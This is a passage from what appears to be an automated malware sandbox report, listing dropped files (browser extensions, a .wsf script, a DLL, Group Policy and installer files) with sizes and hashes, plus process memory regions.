                                                                                                                        SHA1

                                                                                                                        a2d862fc86fabab92029c67fdbe04949b202c8d1

                                                                                                                        SHA256

                                                                                                                        3ffd6cf09f47f94d8cace39db9cb8629db168d86e941a6200c013f946189c931

                                                                                                                        SHA512

                                                                                                                        9309c824958d2efaad658e65ebe180fa9edfc41beec5e89ef27b5a31f51c905e095465c8ced2d92d457cf04c1e07b3a479ebb455dc8f673db81dc81b683fdf0d

                                                                                                                      • C:\Program Files (x86)\ryCjKLcUASjeC\RdHHIAo.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        47cc5e9b23d21286fb57f56e798899a0

                                                                                                                        SHA1

                                                                                                                        e6eedbc2ef8a3b993f173dca77d04de45b79bca5

                                                                                                                        SHA256

                                                                                                                        6cb1eb29b2a7335596a88d18873e3692cd198d2304fd666a169f6f3f21f7d156

                                                                                                                        SHA512

                                                                                                                        2cdfc1e8fc73d8fa2183110e675fcd26c2e0017d1b25c16406749e59168216ca6a2d68c0c5be3b01ac3bb26e44449a65a0e5d8545015e8ba5dbce047546df559

                                                                                                                      • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                        Filesize

                                                                                                                        2.0MB

                                                                                                                        MD5

                                                                                                                        c4b9ce68e044ce7896b889dac91ed74d

                                                                                                                        SHA1

                                                                                                                        cbe58899872c83c29a9031ee8e561339a7468b9f

                                                                                                                        SHA256

                                                                                                                        2b16bce15560b5e4ba66cff71ab9fa108d43b629b8bcd91754b45054ddb21d9a

                                                                                                                        SHA512

                                                                                                                        77bab0199a212c7dc550758a0932ccce3823f697adb63298435589ad1ce4ac22f8cfdd90c0c63e0eb649b69c3fc5053aae18ede29b772872dc4721aae2ab2f43

                                                                                                                      • C:\ProgramData\zbVZwezRqQdbQsVB\jPOvlJY.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        c7dcb9f603c305b868393e7081597071

                                                                                                                        SHA1

                                                                                                                        d76b64582a84ece9979088f2b351f35812b91d1f

                                                                                                                        SHA256

                                                                                                                        be2ecacac34aa68cbe28d647de61f23f7dffff909dd9a65fa9127b8b685cc3e6

                                                                                                                        SHA512

                                                                                                                        9aa9fbcd959f6963aeafd37225794fbd7a5e2360d3bcfc72ae40f9af3a9e90dbde3679bc67edc0138382f27dd819c359a3d2e84e6011372545c09464b174ac6c

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                        Filesize

                                                                                                                        187B

                                                                                                                        MD5

                                                                                                                        2a1e12a4811892d95962998e184399d8

                                                                                                                        SHA1

                                                                                                                        55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                        SHA256

                                                                                                                        32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                        SHA512

                                                                                                                        bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                        Filesize

                                                                                                                        136B

                                                                                                                        MD5

                                                                                                                        238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                        SHA1

                                                                                                                        0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                        SHA256

                                                                                                                        801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                        SHA512

                                                                                                                        2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                        Filesize

                                                                                                                        150B

                                                                                                                        MD5

                                                                                                                        0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                        SHA1

                                                                                                                        6a51537cef82143d3d768759b21598542d683904

                                                                                                                        SHA256

                                                                                                                        0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                        SHA512

                                                                                                                        5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        63c6e6ea7f667ad6e31246b995ad4285

                                                                                                                        SHA1

                                                                                                                        b9bf21cf4894330ba66df23b5db9062d54793e73

                                                                                                                        SHA256

                                                                                                                        baae18bf9d74266ab00cea6b971a1ec662adcfbb6c73bc65cc67b9111d93e406

                                                                                                                        SHA512

                                                                                                                        1ebde01ac21958839e93d12ad455fc5e24d39d7610a4f737a6444bb32ab7cc97a0ae3e5561fbe15d6bcd69b7bd02c25eeadebfcc09429caf269d0e3d0cff7aab

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        0288cb39ef3d24deb400ac3d819e6dd1

                                                                                                                        SHA1

                                                                                                                        95425d7f65065dd170348f88f3d52f45bb85e019

                                                                                                                        SHA256

                                                                                                                        6a0447fb0728fd2e2d1ec7eea35d3f3535fdd6ddcb4659b0e69eeab42a8d1cfa

                                                                                                                        SHA512

                                                                                                                        c71399e2a2dc0d0f07a6616b5cb4b1c753d5422b77584842763b55a8f5563a49b8ac589115bbf2f3b85c508ef3bd1e0b94c9c1cfd1312c3500bde983a29e4628

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        e85845215dd4411838d262098938a86f

                                                                                                                        SHA1

                                                                                                                        3875a5d65ca5501cbae46f3414f902ca4eab8ac0

                                                                                                                        SHA256

                                                                                                                        e9b9a8904506462a25ead56d40c0e786b26f0972823a3d8750b1c8274fafc2f1

                                                                                                                        SHA512

                                                                                                                        bcb5ea7758be161a7db1e7b80a8a8fdb8178c3a6a94af9ffdf702ffb8540c6a049ccfac1413c5df7e6b5d2332f0ca4239c91c84fd4440424c2563ef92edb18ac

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P8JGT3LNGTPK705MJJAL.temp

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        6cef35c6d69dfa8f5139305f8d0a0e2d

                                                                                                                        SHA1

                                                                                                                        df9542c20c344ff63a590c74d8e027f100a56d40

                                                                                                                        SHA256

                                                                                                                        45d8f5dadecc4228dd21945fe1a99d3d162c4db77a37277ba889d2975b3d2d2e

                                                                                                                        SHA512

                                                                                                                        e64fabb71a8a649e3a5c17e59964970515863d20fd0fe15e9499a6e0caf474bd1c0418df5d5b502bb1474cb7a81b3a972742b7eb260a2de9b7498b60383fc5f2

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sexvjvzg.default-release\prefs.js

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        71b953b3b5180340fb76a06ae35ccba3

                                                                                                                        SHA1

                                                                                                                        50d113fa9fbc7d436b3eab15d2b0089d302c0212

                                                                                                                        SHA256

                                                                                                                        8173099194592fb07aa4a269731f843d7fb773ec765a6d63017ac28690ca9fce

                                                                                                                        SHA512

                                                                                                                        6c2c989ca18196ebe39358c46c399b558323e8ab48cc8d749446d20616eb51c3a92b6339360b58db0489ca611ddef1e02a7d6b25acc3d8a9b94b28a9b56fcd3c

                                                                                                                      • C:\Windows\Temp\GyCSmFAiAvfejamA\HmNipWOM\zYykGqavHzomYZaM.wsf

                                                                                                                        Filesize

                                                                                                                        9KB

                                                                                                                        MD5

                                                                                                                        a7b459dda2a1df3ff60578886cd2ba03

                                                                                                                        SHA1

                                                                                                                        a5c723bbc3cab434ac2398c897b8a858ae3d1f54

                                                                                                                        SHA256

                                                                                                                        502ce64896c792af82b9fdd2330cc2c27ab4d1f6d6cec1b59432828ffa75faa0

                                                                                                                        SHA512

                                                                                                                        cca2f1a090beb378dead82081de1151746cce7d3d00ec71b100152cbb662a23f471866c0fd836cabbe304a327d4c86d9d2ef64f9afe486204e9fd6838989a9c1

                                                                                                                      • C:\Windows\Temp\GyCSmFAiAvfejamA\bhjBzADp\XmJUKNX.dll

                                                                                                                        Filesize

                                                                                                                        6.5MB

                                                                                                                        MD5

                                                                                                                        ce6fdcd8530effeed1885771c1463b66

                                                                                                                        SHA1

                                                                                                                        bd5dbd728958f3af007f60ae9b14242a393d0c4b

                                                                                                                        SHA256

                                                                                                                        114550c23ad960030445a9647b5769fa82a04216f9b7029edd64596aac1ae00f

                                                                                                                        SHA512

                                                                                                                        451445666ac61b71144dff289961e12437062d1eeace962d178154d13d2035ac9f3095122177269bb2d6240d0bd3a177f6e36ea339285dd6ae4f52e0e62ae771

                                                                                                                      • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        1cc23872dccfc7478f784d36bc6ef4ba

                                                                                                                        SHA1

                                                                                                                        63f7136de6896061b8a1d457214dddf878caa980

                                                                                                                        SHA256

                                                                                                                        1f99af6009c31cbc68c3d430cc8c4baae781bb1aac4e20f7092c72996fa6fc6a

                                                                                                                        SHA512

                                                                                                                        13627b1d5f9ab2d810def9be9377c40ba899060f1cbe5931f890d2f8cd607cd328c4fa39b589d393886410d86a2bfca52e3ef78c86671aee990d154663ac3a1c

                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe

                                                                                                                        Filesize

                                                                                                                        6.4MB

                                                                                                                        MD5

                                                                                                                        50efad4341d7f65c2e7ab8205a49fdb2

                                                                                                                        SHA1

                                                                                                                        b936f08ec007d8a139e008e9861773746d6ab2a6

                                                                                                                        SHA256

                                                                                                                        459ca8e9cb692553970b2c1e861b3cc53c14d3f5f9856c0b5ca66b617321e854

                                                                                                                        SHA512

                                                                                                                        d9220a4516e0c242e2aa95b282395c5f7a754a31a6ab7036dea6b13dae964e2b236e40bb27788104472777293e2c4e9736c6c380d8ce3dec304b66410e1a441b

                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS253C.tmp\Install.exe

                                                                                                                        Filesize

                                                                                                                        6.6MB

                                                                                                                        MD5

                                                                                                                        7d00023ceef9ef54d0f55a3f84ba4a15

                                                                                                                        SHA1

                                                                                                                        3ad394fb61dec8b1aba5a049dfdf54ccd4358767

                                                                                                                        SHA256

                                                                                                                        6c39082e3053e6edfb91745ae1c8f326a0ce14e4e4b3778ea9d978968e7b5729

                                                                                                                        SHA512

                                                                                                                        91d28a5c20a811f05affbb8104f214a31abf6891cc921a752678048a99ce2121549957c14fedfb5319b792ac5e55594e93d4845ec7ad87cf7f25db8275ac9818

                                                                                                                      • memory/600-48-0x0000000010000000-0x0000000013BD1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        59.8MB

                                                                                                                      • memory/600-60-0x0000000000E80000-0x0000000001528000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/600-92-0x0000000000E80000-0x0000000001528000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/600-47-0x0000000000E80000-0x0000000001528000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/1000-83-0x000000001B720000-0x000000001BA02000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.9MB

                                                                                                                      • memory/1020-91-0x0000000000070000-0x0000000000718000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/1020-306-0x0000000000070000-0x0000000000718000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/1020-368-0x0000000000070000-0x0000000000718000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/1020-95-0x0000000010000000-0x0000000013BD1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        59.8MB

                                                                                                                      • memory/1020-106-0x0000000002330000-0x00000000023B5000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        532KB

                                                                                                                      • memory/1020-333-0x0000000003140000-0x0000000003220000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        896KB

                                                                                                                      • memory/1020-139-0x0000000001880000-0x00000000018E2000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        392KB

                                                                                                                      • memory/1020-323-0x0000000002B60000-0x0000000002BE9000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        548KB

                                                                                                                      • memory/1608-58-0x000000001B680000-0x000000001B962000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.9MB

                                                                                                                      • memory/1608-59-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/2676-22-0x0000000002380000-0x0000000002A28000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2676-40-0x0000000002380000-0x0000000002A28000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2708-70-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.9MB

                                                                                                                      • memory/2708-71-0x0000000002070000-0x0000000002078000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/2784-365-0x00000000015A0000-0x0000000005171000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        59.8MB

                                                                                                                      • memory/2820-41-0x00000000017A0000-0x0000000001E48000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2820-25-0x00000000017A0000-0x0000000001E48000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2820-26-0x00000000010F0000-0x0000000001798000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2820-24-0x00000000017A0000-0x0000000001E48000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2820-23-0x00000000017A0000-0x0000000001E48000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2820-29-0x0000000010000000-0x0000000013BD1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        59.8MB

                                                                                                                      • memory/2820-43-0x00000000017A0000-0x0000000001E48000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2820-42-0x00000000017A0000-0x0000000001E48000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                      • memory/2820-44-0x00000000010F0000-0x0000000001798000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.7MB